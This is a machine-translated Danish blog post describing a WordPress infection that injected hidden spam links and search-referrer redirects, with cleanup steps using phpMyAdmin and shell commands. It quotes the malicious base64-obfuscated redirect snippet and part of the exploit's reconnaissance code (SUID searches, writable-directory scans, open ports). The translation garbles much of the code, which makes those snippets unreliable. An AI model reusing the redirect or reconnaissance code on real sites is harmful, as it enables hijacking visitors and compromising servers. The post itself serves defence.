Blogosfæren virus ... men jeg har haft det?!

I den sidste måned har jeg modtaget advarsler virus blog i nogle besøgende. Oprindeligt jeg ignorerede advarslerne, fordi jeg installerede en temmelig god antivirus (Kaspersky AV 2009) Og selvom bloggen i lang tid, jeg fik aldrig en virus alert (.. Jeg så noget mistænkeligt tidligere, at den første refresh forsvundet. Endelig ...).
Langsomt begyndte at dukke store variationer besøgende trafikHvorefter trafikken sidst er faldet støt og begyndte at være flere og flere mennesker, der fortæller mig, at stealthsettings.com det er virusser. I går modtog jeg fra en person et screenshot gjort, når antivirus blokerede en script Den stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Det var temmelig overbevisende for mig, at jeg sætter alle kilder søgte. Den første idé, der kom til mit sind var at gøre opgradering den nyeste version af WordPress (2.5.1), men ikke før den gamle script til at slette alle filer af WordPress og gøre backup-database. Denne procedure har tabt sagen, og sandsynligvis ville have taget lang tid at regne SEMA hvor det kog, hvis jeg ville have sagt i en diskussion over en kop kaffe, fandt han Google, og det ville være godt at se ham.
MyDigitalLife.info offentliggjorde en artikel med titlen: "WordPress Hack: Recover og Fix Google og Search Engine eller Nej Cookie trafik omdirigeret til Your-Needs.info, AnyResults.Net, Golden-Info.net og andre ulovlige Sites"Det er slutningen af ​​tråden jeg havde brug for.
Det handler om en udnytte WordPress baseret på cookie, Hvilket jeg synes er meget kompleks og gjort bogen. Klog nok til at gøre en SQL Injection Database af bloggen, at skabe et usynligt bruger en simpel rutine tjek Oversigt->Brugere, tjekke server mapper og filer "skrivbare" (Med chmod 777), til at søge og udføre filer med privilegier root-brugeren eller gruppen. Jeg ved ikke, hvem udnytter navn og se, at der er få artikler skrevet om ham, til trods for at mange blogs er smittet, herunder Rumænien. Ok ... Jeg vil prøve at forsøge at forklare almindeligheder om virus.

Hvad er virus?

Først indsætter kilden siderne til blogs, links usynlige for besøgende, men synlige og vendeskær til søgemaskiner, især Google. På denne måde overføre sideplacering til websteder, der er angivet af hackeren. For det andet, er indsat omdirigering kode URL for besøgende der kommer fra Google, Live, Yahoo, ... eller en RSS-læser, og ikke det websted cookie. A antivirus registrerer omdirigering som Trojan-Clicker.HTML.

Symptomer:

Massive fald i besøgende trafik, Især på blogs, hvor de fleste besøgende kommer fra Google.

Identifikation: (Derfor blev problem for dem, der ikke ved, hvordan hvordan man phpmyadmin, php og linux)

LA. OBS! Først lave en backup database!

1. Kontroller kildefilerne index.php, header.php, footer.php, The blog emne, og se om der er en kode, der bruger kryptering base64 eller som indeholder "if ($ Ser ==" 1 && sizeof ($ _COOKIE) == 0?) "formular:

<? Php
$ Seref = array ("google", "msn", "live", "AltaVista"
"Spørg", "yahoo", "AOL", "CNN", "vejr", "Alexa");
$ Ser = 0, foreach ($ Seref som $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref) == False) {$ ser = "1,? Break;}!
if ($ ser == "1 && sizeof ($ _COOKIE) == 0?) {header (" Location: ". base64_decode ("). 'http:// YW55cmVzdWx0cy5uZXQ = / ") exit;
}>

... Eller noget. Slet denne kode!

Klik på billedet ...

index kode

I skærmbilledet ovenfor jeg valgt ved en fejltagelse og "<Php get_header ();?>". Denne kode bør forblive.

2. Brug phpMyAdmin og gå til database tabel wp_usersHvor kontrollere, om der er nogen brugernavn oprettet på 00:00:00 0000-00-00 (Mulig placering user_login skriver "WordPress". Skriv denne bruger-id (felt-ID) og derefter slette den.

Klik på billedet ...

Falsk bruger

* Den grønne linje bør fjernes og beholdt sit id. I tilfælde af Var ID = 8 .

3. Gå til tabellen wp_usermeta, Hvor placeret og Fjern linjer for id (hvor feltet user_id ID værdi vises slettet).

4. I tabel wp_option, Til Go active_plugins og se, hvad plugin er aktiveret mistænkte. Det kan bruges som slutninger _old.giff, _old.pngg, _old.jpeg, _new.php.giffEtc Udvidelser kombinationer med _old og _new falske image.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Slet dette plugin, så gå til bloggen -> Dashboard -> Plugins, som deaktiverer og aktiverer et bestemt plugin.

Klik på billedet for at se det ser active_plugins virus fil.

plugin

Følg stien på FTP eller SSH, der er angivet i active_plugins og slette filen fra serveren.

5. Alt i phpMyAdmin, i tabel wp_option, Finde og slette den linje, der indeholder "rss_f541b3abd05e7962fcab37737f40fad8"Og blandt"internal_links_cache ".
I internal_links_cache gøres krypterede spam links, der vises i din blog og en Google Adsense kode, The hacker.

6. Anbefalet er at ændre password Blog og login fjerne alle mistænkelige userele. Opgrader til den nyeste version af WordPress og sætte blog til ikke at tillade registrering af nye brugere. Der er ingen tab ... kan ikke kommentere og ulogisk.

Jeg forsøgte at forklare over noget, hvad de skal gøre i en sådan situation at rense denne virus blog. Problemet er mere alvorligt end det forekommer og næppe løst, som anvendes sikkerhedshuller den webserver hosting, som er blog.

Som en første foranstaltning af sikkerhed, med adgang SSH, Lav nogle kontroller på serveren for at se om nogen filer som * _old * og * _new. * Med endelser.giff. jpeg,. pngg. jpgg. Disse filer bør udgå. Hvis du omdøber en fil, for eksempel. top_right_old.giff in top_right_old.phpVi ser, at filen er præcis den exploit-kode serveren.

Nogle nyttige indikationer af kontrol, rengøring og sikkerhed server. (Via SSH)

1. cd / tmp og se om der er mapper som tmpVFlma eller andre kombinationer har samme navn og slette den. Se screenshot nedenfor to sådanne mapper fra mig:

tmpserver

rm-rf mappenavn

2. Tjek elimiati (chmod ændring) som mulige mapper attributter chmod 777

finde alle skrivbare filer i den aktuelle dir: Find. -Type F-perm-2-ls
finde alle skrivbare mapper i den aktuelle dir: Find. -Type d-perm-2-ls
finde alle skrivbare mapper og filer i den aktuelle dir: Find. -Perm-2-ls

3. Leder du efter mistænkelige filer på serveren.

Find. -Name "* _new.php *"
Find. -Name "* _old.php *"
Find. -Name "*. Jpgg"
Find. -Name "* _giff"
Find. -Name "* _pngg"

4, OBS! de filer, der blev sat bit SUID si Sgid. Disse filer udføre med rettighederne for brugeren (gruppe) eller rod, ikke den bruger, der køre filen. Disse filer kan føre til rod kompromis, hvis det sikkerhedsspørgsmål. Hvis du bruger filerne med SUID og sgid bits, udføre 'chmod 0 " på eller afinstallere den pakke der indeholder dem.

Udnytte indeholder andet sted i kilden ...:

if ($ safe_mode) {
if ($ ostype == 'nix') {
$ Os = Udfør ('sysctl-n kern.ostype ").;
$ Os = Udfør ('sysctl-n kern.osrelease ").;
$ Os = Udfør ('sysctl-n kernel.ostype ").;
$ Os = Udfør ('sysctl-n kernel.osrelease ").;
if (empty ($ bruger)) $ user = udføre ('id');
$ Aliaser = array (
"=>",
'Find suid filer' => 'find /-type F-perm-04000-ls',
'Find sgid filer' => 'find /-type F-perm-02000-ls',
'Find alle skrivbare filer i den aktuelle dir' => 'finde. -Type F-perm-2-ls ',
'Find alle skrivbare mapper i den aktuelle dir' => 'finde. -Type d-perm-2-ls ',
'Find alle skrivbare mapper og filer i den aktuelle dir' => 'finde. -Perm-2-ls ',
'Vis åbnet porte' => 'netstat-an | grep-jeg lytter'
);
Else {}
. $ Os_name = Udfør (»ver ');
$ User = Udfør ('echo% username% ").;
$ Aliaser = array (
"=>",
"Vis runing services '=>' net start"
'Vis proces listen' => 'tasklist'
);
}

På denne måde ... dybest set finder brud på sikkerheden. Havne åbne biblioteker "skrivbare", og gruppen execution privilegier filer / rod.

Tilbage med mere ...

Nogle inficerede blogs: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... Listen går ... en masse.

Du kan kontrollere, om en blog er virus, ved hjælp af søgemaskinen Google. copy & paste:

hjemmeside www.blegoo.com buy

Godnat og øge arbejde ;) Snart vil jeg komme med opdateringer Eugen på prevezibil.imprevizibil.com.

brb :)

TO: ATTENTION! Ændring af WordPress tema eller opgradering til WordPress 2.5.1, ikke en løsning for at slippe af med denne virus.

Blogosfæren virus ... men jeg har haft det?!

Om forfatteren

Stealth

Passionær over alt hvad der betyder gadgets og IT, skriver jeg med glæde stealthsettings.com fra 2006, og jeg kan godt lide at opdage nye ting om computere og operativsystemer macOS, Linux, Windows, iOS og Android.

Efterlad en kommentar

Dette websted bruger Akismet til at reducere spam. Lær, hvordan dine kommentardata behandles.